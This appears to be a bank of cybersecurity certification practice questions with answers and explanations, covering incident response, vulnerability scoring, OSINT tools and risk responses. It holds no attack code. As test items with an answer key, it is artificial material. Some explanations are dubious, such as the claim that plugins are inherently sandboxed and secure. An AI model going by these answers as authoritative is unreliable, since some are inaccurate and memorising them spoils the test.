D. Isolate affected systems Isolating the affected systems prevents the potential spread of the security threat, allowing the team to effectively remediate the issue and protect other systems in the organization.

An organization has tasked a cybersecurity analyst with training its security team on the importance of attack methodology frameworks. Which method is a key component of attack methodology frameworks when containing a threat during an ongoing attack? A. Data and log analysis B. Vulnerability assessment C. Penetration testing D. Isolation

D. Isolation Isolating affected systems or networks helps prevent the spread of an attack and minimizes potential damage. Organizations can better manage the incident by containing the threat and focusing on remediation efforts.

A security analyst is writing a script to automate security operations. However, the analyst is confused about which data format to use for the script: JSON or XML. Which data format should the analyst use for the script? A. XML B. TXT C. CSV D. JSON

D. JSON JavaScript Object Notation (JSON) is the preferred data format for scripting and automation tasks in security operations. JSON is lightweight, easy to parse, and widely supported. It is commonly used for exchanging data between web applications and provides better performance and flexibility compared to XML.

A security operations center (SOC) incident response analyst needs to know the entanglement of systems during an attack as quickly as possible. Therefore, the analyst needs a tool that can help quickly identify the relationships through visualization. Which tool could help the analyst investigate an emerging attack? A. Prowler B. ScoutSuite C. Nmap D. Maltego

D. Maltego Maltego is a very sophisticated visualization tool that helps investigators quickly identify relationships among entities of many types. As a result, Maltego can help in many investigations, from people and social engineering to malware analysis.

A network security engineer provided a report to the operations manager with a large amount of public information that is accessible solely from the company's website. For example, the report shows email addresses and other company phone numbers on a graph that would otherwise be known internally. What tool did the network security engineer most likely use to gather this information with little effort? A. Angry IP scanner B. Metasploit C. Recon-ng D. Maltego

D. Maltego Maltego is a visualization tool that gathers public information and presents it connected in a graph. It can research and map entities quicker than other tools.

Which security control category gives oversight of the information system? A. Operational B. Technical C. Preventative D. Managerial

D. Managerial Managerial controls (a control category) give oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

A dog food manufacturing company's security team identified a malicious code injection in their system approximately 48 hours after the incident. It is roughly in line with the team's normal performance for this task. What metric does this indicate? A. Mean time to respond B. Mean time to remediate C. Alert volume D. Mean time to detect

D. Mean time to detect The mean time to detect is the average time it takes to identify a security incident or event. The team took 48 hours to detect the breach.

A bookcase restoration company has a compromising network, and the security team has ameliorated the situation via containment and restorative measures in 20 minutes. It is roughly in line with the team's normal performance for this task. What metric does this refer to? A. Alert volume B. Mean time to detect C. Mean time to respond D. Mean time to remediate

D. Mean time to remediate The mean time to remediate is the average time it takes to resolve or mitigate the impact of a security incident or event after it responds to the event. It took 20 minutes to remediate.

An organization recently suffered a data breach and must focus on validating data integrity and implementing compensating controls. The IT security team will need to analyze network indicators to identify potential threats and improve security measures. Which of the following actions would be most appropriate for the security team to take in this situation? A. Implement a role-based access control system B. Conduct a thorough digital forensics investigation C. Utilize secure data backup and recovery procedures D. Monitor network traffic for unusual patterns

D. Monitor network traffic for unusual patterns Analyzing network indicators and monitoring network traffic for unusual patterns can help the security team identify potential threats, validate data integrity, and determine the effectiveness of compensating controls.

A small pet insurance company has just experienced a cyber attack. The incident response team finds that the IT auditing team may have been negligent in their systems administration according to the Payment Card Industry Data Security Standard (PCI DSS) standard. The incident response team has taken steps, including internal coordination, to contain and investigate the attack. What next step should the team consider in the incident response reporting process? A. Notify senior management B. Notify customers C. Notify Computer Emergency Readiness Team (CERT) D. Notify external regulatory authorities

D. Notify external regulatory authorities After containment and investigation, law enforcement reporting is the next step in the incident response reporting process. It must happen after senior management and internal stakeholders are tracking the situation.

A security analyst must identify and assess web application vulnerabilities. Which of the following frameworks is best suited for this task? A. Diamond Model of Intrusion Analysis B. Cyber kill chain C. MITRE ATT&CK D. OWASP Testing Guide

D. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide provides a comprehensive methodology for identifying and assessing web application vulnerabilities.

The businesses security operations center (SOC) is currently re-evaluating the yearly budget. They decided to use different alternatives, including reduced overhead spending and less intensive resources on the company's current systems. The SOC's final decision was to use a different scanning method that monitors and inspects the network traffic more thoroughly. What method of scanning best matches what the SOC has decided? A. Active B. Internal scanning C. External scanning D. Passive

D. Passive Passive scanning describes ways to identify vulnerabilities without directly interacting with a device or software. The primary example of this is network packet capture.

An organization has experienced a recent security breach, and the security team must identify the malicious activity that led to the breach. What should the team do first to determine the source of the breach effectively? A. Implement an intrusion detection system (IDS) B. Deploy an endpoint detection and response (EDR) tool C. Conduct a vulnerability assessment D. Perform a root cause analysis

D. Perform a root cause analysis By conducting a root cause analysis, the security team can identify the malicious activity that led to the breach and take appropriate measures to prevent similar incidents.

A company wants to extend the functionality of their website by adding new features such as social media integration, an online store, or a customer support chatbot. However, the company is concerned about the security implications of adding new features to their website and wants to ensure that any technology used is secure and does not introduce new vulnerabilities. What technology can the company use to achieve this goal in a secure manner? A. APIs B. SDNs C. Webhooks D. Plugins

D. Plugins Plugins are add-ons that extend the functionality of an existing software or system. They are a secure way of adding new features to a website as they are sandboxed and run in isolation from the main application.

What is the ultimate goal of a vulnerability assessment? A. Calculate the risk score B. Measure the affected hosts from a potential breach C. Replace primary security measures with compensating controls D. Prioritize vulnerabilities for mitigation based on risk and potential impact

D. Prioritize vulnerabilities for mitigation based on risk and potential impact The required mitigations communicate what needs to be done to prevent the exploitation of vulnerabilities discovered in a vulnerability assessment.

A mid-size rose farm and distributor has experienced a security incident from a malicious USB drive, resulting in a significant data breach. The organization has taken measures to investigate and remediate the incident, but they want to ensure that the incident does not recur. What is the most appropriate step that the organization can take to reduce the likelihood of recurrence? A. Review mitigations required from previous attacks B. Measure the affected hosts C. Calculate the risk score D. Provide awareness training to all employees on the importance of securing peripheral devices, such as USBs

D. Provide awareness training to all employees on the importance of securing peripheral devices, such as USBs Awareness training regarding peripheral devices, such as USBs, is the best way to prevent recurrence in this case.

A small business has suffered a data breach resulting from an employee falling victim to a phishing email. The attacker was able to gain access to sensitive customer information and financial data. What could have helped prevent this breach? A. Implementing service-level objectives (SLOs) to ensure a reduction in breaches B. Providing awareness, education, and training on how to implement configuration management C. Implementing a zero-day tracker D. Providing awareness, education, and training on how to recognize and respond to phishing emails

D. Providing awareness, education, and training on how to recognize and respond to phishing emails Providing awareness, education, and training on how to recognize and respond to phishing emails is the best way to mitigate phishing attacks.

An attacker targets a web application and manipulates the URL to include a file path located on a separate server. Since the application does not properly validate the input, it executes the code residing in the remote file. As a result, the attacker can take control of the web application due to the code's execution. What type of vulnerability does this situation describe? A. LFI B. RCE C. XSS D. RFI

D. RFI Remote file inclusion (RFI) allows attackers to inject code from a remote server into the application, whereas local file inclusion accesses or executes files from the target itself. This file inclusion is remote as the file resides on a remote system.

An analyst at a financial services company is conducting a review of several threat intelligence providers. If the analyst wants to ensure they can filter reports by industry, they are likely concerned about what attribute of threat intelligence? A. Timeliness B. Accuracy C. Open source D. Relevancy

D. Relevancy Relevancy refers to the usefulness of a piece of information concerning a specific threat. Relevant information is actionable and gives an organization meaningful context. Filtering information by the appropriate industry increases its relevancy.

A cyber security specialist has extracted source code from an unknown piece of software interrupting internal systems. The specialist uses a tool to identify the software methods and languages used and inspect how the software operates. What tool does the cyber security specialist use to confirm it meets security requirements or to determine if a threat actor has tampered with it? A. Vulnerability scan B. Map/discovery scan C. Device fingerprinting D. Reverse engineering

D. Reverse engineering Reverse engineering describes deconstructing software and/or hardware to determine how the developer created them.

A technology company has a data breach compromising employee and customer information. Which of the following steps should the incident response team take to determine the initial scope of the incident most efficiently? A. Perform a full forensic investigation of the affected systems B. Conduct interviews with affected employees and customers C. Conduct a vulnerability assessment of the affected systems D. Review system logs and access records

D. Review system logs and access records Reviewing system logs and access records is important to determine the scope of a data breach. This information can help the incident response team identify the affecting systems and data and the extent of the compromise.

A security analyst needs to determine the underlying cause of a security incident that recently occurred within the organization. Which method should the analyst use to identify the primary reason behind the incident? A. Forensic analysis B. Vulnerability assessment C. Penetration testing D. Root cause analysis

D. Root cause analysis Root cause analysis is a problem-solving method that aims to identify the fundamental reason behind an incident or issue. Using root cause analysis, the analyst can determine the primary cause of the security incident and develop appropriate remediation measures.

A security operations center (SOC) manager notices that analysts are performing a high volume of mundane tasks to resolve false positive alerts in the security information and events manager (SIEM). What could be implemented to help reduce this workload? A. Paid feeds B. Threat hunting C. A honeypot D. SOAR

D. SOAR Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to specific SIEM-generated alerts. When something triggers an alert, the system can analyze it by following a defined set of instructions.

A security engineer is assessing vulnerabilities in the organization's SSO solution. The engineer has found multiple vulnerabilities and discovered that, despite the exploit vectors and results being substantively similar, the CVSS scores differ significantly between the SSO and the NTP server. What is the most reasonable explanation for this phenomenon? A. SSO requires a more complex attack than an NTP server. B. NTP servers require a more sophisticated threat actor than SSO solutions. C. NTP server is a more valuable asset than SSO. D. SSO is a more valuable asset than an NTP server.

D. SSO is a more valuable asset than an NTP server. The most reasonable explanation for the difference in the Common Vulnerability Scoring System (CVSS) score is the asset value of single sign-on (SSO) and network timing protocol (NTP) servers. SSO is a significantly more valuable asset than an NTP server.

A company uses a default username and password for their router, and the login page is accessible from the internet. An attacker can guess the default credentials and gain privileged access to the router. What type of vulnerability does this situation describe? A. XSS B. Cryptographic failures C. Broken access control D. Security misconfiguration

D. Security misconfiguration Security misconfiguration refers to configuring a system insecurely, such as using default passwords or leaving unnecessary ports open.

A cybersecurity analyst at a company notices an unusual spike in network traffic that leads to service interruptions. The analyst suspects that this may be due to a security breach. Why could these service interruptions be an indicator of a security breach? A. Service interruption is usually caused by power outages or hardware failures. B. Service interruption is often the result of user error, such as misconfiguration of network devices. C. Service interruption might be caused by routine maintenance tasks that require temporarily taking down the system. D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network.

D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. This is a common tactic used by attackers to disrupt the availability of a network service.

A cybersecurity team for a new manufacturing company is looking for a solution to consolidate their security monitoring tools into a simplified interface due to the large amount of data they need to review. Which term best describes this approach? A. Data enrichment B. Essential strategy C. Threat feed combination D. Single pane of glass

D. Single pane of glass A single pane of glass approach refers to the consolidation of security monitoring tools into a unified interface, allowing security teams to have a centralized view of their security posture.

A security analyst investigates a suspected network attack on a company's server. The analyst needs to capture and analyze network traffic to identify the source and type of attack. The analyst decides to use tcpdump and Wireshark for the analysis. Which of the following statements is true about tcpdump and Wireshark when used for network traffic analysis in a security investigation? A. Tcpdump is a network traffic capture tool that identifies the source and type of an attack, while Wireshark is a network traffic analysis tool that visualizes and filters captured traffic. B. Wireshark is a network traffic capture tool that identifies the source and type of an attack, while Tcpdump is a network traffic analysis tool that visualizes and filters captured traffic. C. Tcpdump and Wireshark are both network traffic analysis tools that can be used to visualize and filter captured traffic, but cannot be used to identify t

D. Tcpdump and Wireshark are both network traffic capture and analysis tools that identify the source and type of an attack. Tcpdump and Wireshark capture and analyze network traffic, allowing the identification of the source and type of attacks. Tcpdump captures and displays network traffic through the command-line, while Wireshark offers a more advanced graphical interface to capture and analyze packets, facilitating deep inspection of captured traffic.

An Information Systems Security Officer (ISSO) received a report about secure shell (SSH) access to a network device and quickly reported it up the chain of command. SSH is normally prohibited since a central networking management application manages the network devices. However, the next day, the operations manager addressed the case as a false-positive and confirmed the network team's tasks with an official end date. Why did the operations manager conclude that the security event was false-positive? A. The network team has an indefinite exemption. B. The network team did not have an approved exemption. C. The network devices are exempt from security scans. D. The network team has a temporary exemption.

D. The network team has a temporary exemption. A false-positive conclusion assumes that secure shell (SSH) access was legitimate, even for a short time. The manager's confirmation of an end date concludes that the SSH access is temporary.

A company has just experienced a data breach, and the incident response team needs to create a timeline for the incident. Which of the following is the most important factor to consider when creating the timeline? A. The time of day the attack occurred B. The type of attack that was used C. The length of time the attack lasted D. The order of events during the attack

D. The order of events during the attack Creating a timeline that accurately reflects the order of events during the attack is critical to understanding the attack and identifying potential weaknesses in the organization's security posture.

What is the benefit of hardening the operating system in the context of system and network architecture? A. To increase the number of software applications that can be run on the system B. To reduce the speed of system performance due to the extra security measures C. To improve the aesthetics of the graphical user interface (GUI) D. To decrease the risk of unauthorized access to sensitive data

D. To decrease the risk of unauthorized access to sensitive data Hardening the operating system is a security measure involving configuring the operating system to minimize security vulnerabilities. By implementing security measures such as firewalls, intrusion detection systems, and access control mechanisms, the user significantly reduces the risk of unauthorized access to sensitive data.

Which of the following is the most important reason to implement system hardening measures in a networked environment? A. To prevent denial-of-service attacks B. To secure data in transit between systems C. To ensure system performance remains optimal D. To reduce the risk of data breaches

D. To reduce the risk of data breaches System hardening measures like removing unnecessary software and services, disabling default accounts, and applying patches and updates help reduce the attack surface of a system and directly reduce the risk of data breaches.

A large pest control company's web application allows users to schedule appointments with their technicians every month. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. Therefore, the company decides to outsource the software's functionality to a contractor who can contractually guarantee a certain level of operational safety through insurance. What kind of risk response does this represent? A. Avoidance B. Mitigation C. Acceptance D. Transference

D. Transference Risk transference (or sharing) means assigning risk to a third party, which most typically occurs through insurance policies.

A script kiddie is most likely to conduct which of the following operations? A. Setting up a watering hole to steal the login credentials for online bank accounts B. Monitoring the email communications of two European Prime Ministers C. Defacing the website of a prominent global oil company D. Using multiple unsophisticated scanning tools against a public-facing website

D. Using multiple unsophisticated scanning tools against a public-facing website Script kiddie refers to an unsophisticated actor who uses readily available hacker tools. Often a script kiddie has a limited understanding of the tools they are using.

A health software vendor issues a security patch to fix a known vulnerability in their system. What is the best way to ensure the hospital security administrator correctly applies the patch on the hospital's systems and addresses the original vulnerability? A. Testing B. Implementation C. Rollback D. Validation

D. Validation Patch validation verifies that the security administrator has correctly applied the patches or configuration changes to a system and has addressed the intended security vulnerability or issue.

Which of the following is a significant difference between containerization and virtualization in the context of security operations? A. Containerization provides a higher level of isolation between the container and the host operating system compared to virtualization. B. Virtualization provides faster resource allocation than containerization. C. Containerization enables multiple operating systems to run on a single physical machine, while virtualization does not. D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not.

D. Virtualization enables multiple operating systems to run on a single physical machine, while containerization does not. The primary difference between containerization and virtualization is that virtualization allows multiple virtual machines to run different operating systems on a single physical machine, while containerization allows multiple containers to run on a single operating system instance.

What are the types of mitigations that would NOT be recommended in a detailed vulnerability report? A. Identify a patch B. Identify a permanent workaround C. Identify a temporary workaround until a patch is available D. Wait to see if a patch may be introduced sometime in the future

D. Wait to see if a patch may be introduced sometime in the future Waiting on a patch, thereby neglecting a vulnerability, can lead to serious consequences such as data breaches, loss of sensitive information, and damage to reputation.

An unauthorized hacker has discovered a publicly known vulnerability in a retail store's cloud-based supply chain management software. The exposure has a CVSS score of 9.3 and a high impact to confidentiality. Fortunately, there is no appropriate proof of concept or publicly available exploit for this vulnerability. What is the biggest hurdle to the hacker gaining access to the retail store's supply chain management software? A. Exploitability B. Attack complexity C. Attack vectors D. Weaponization

D. Weaponization There are no currently available exploits or proofs of concept for the identified vulnerability. Therefore, the hacker requires the use of weaponization for success.

Which of the following provides the most correct description of zero-days in vulnerability management reporting and communication? A. Zero-days are vulnerabilities that should only be tracked if actively exploited. B. Zero-days are low-priority vulnerabilities that can be ignored until a patch is available. C. Zero-days are moderately serious vulnerabilities that are mitigated by configuration management procedures. D. Zero-days are vulnerabilities that require immediate attention and are tracked in a dashboard.

D. Zero-days are vulnerabilities that require immediate attention and are tracked in a dashboard. Zero-days are vulnerabilities to which there is no patch because they are not publicly known. Attackers can exploit these vulnerabilities to gain unauthorized access to systems and data. Analysts consider zero-days as high-priority vulnerabilities that require immediate attention, and analysts should track them in a dashboard.